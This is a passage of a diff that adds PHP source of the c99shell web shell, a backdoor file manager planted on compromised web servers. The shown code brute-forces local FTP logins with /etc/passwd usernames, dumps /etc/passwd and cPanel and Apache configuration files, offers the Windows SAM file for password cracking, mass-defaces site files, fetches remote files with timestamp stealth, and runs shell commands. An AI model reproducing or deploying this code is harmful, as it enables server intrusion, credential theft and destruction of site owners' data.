+     if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+     }
+    }
+   }
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh)
+   {
+    if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+    else {$true = true;}
+   }
+   else {$true = true;}
+   if ($true)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return true;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    { 
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      $success++;
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    } 
+    if ($success == 0) {echo "No success. connections!";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+   }
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Server security information:</b></center>";
+ echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Safe-Mode: ".$hsafemode."</b><br>";
+ echo "<b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   $num = $nixpasswd + $nixpwdperpage;
+   echo "<b>*nix /etc/passwd:</b><br>";
+   $i = $nixpasswd;
+   while ($i < $num)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid) {echo join(":",$uid)."<br>";}
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+   "text"=>$text, "text_regexp"=>$text_regxp,
+   "text_wwo"=>$deface_text_wwo,
+   "text_cs"=>$deface_text_cs,
+   "text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+  if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+   c99fsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";}
+ }
+ else
+ {
+  echo "<b>Changing file-mode</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+												 if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+   $cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\","/",$v);
+   if (is_dir($v))
+   {
+    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while ($o = readdir($h)) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   
+   $k = $sort[0];
+   if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+   if (empty($sort[1])) {$sort[1] = "d";}
+   if ($sort[1] != "a")
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+   }
+   else
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
+   }
+   
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
+   }
+   
+   $tab = array();
+   $tab[cols] = array($row);
+   $tab[head] = array();
+   $tab[dirs] = array();
+   $tab[links] = array();
+   $tab[files] = array();
+
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $dir = dirname($v);
+     
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+  
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+     else {$type = "DIR";}
+     $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size(filesize($v));
+    }
+    $row[] = date("d.m.Y H:i:s",filemtime($v));
+     
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+    }
+         
+    if (is_writable($v)) {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"green\">".view_perms(fileperms($v))."</font></a>";}
+    else {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
+
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab[links][] = $row;}
+    elseif (is_dir($v)) {$tab[dirs][] = $row;}
+    elseif (is_file($v)) {$tab[files][] = $row;}
+   }   
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+   global $v;
+   return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+   $tab[dirs] = array_reverse($tab[dirs]);
+   $tab[files] = array_reverse($tab[files]);
+  }
+  //Compiling table
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<center><b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b></center><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
+   echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
+   echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
+  }
+  if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Unselect</option>";}
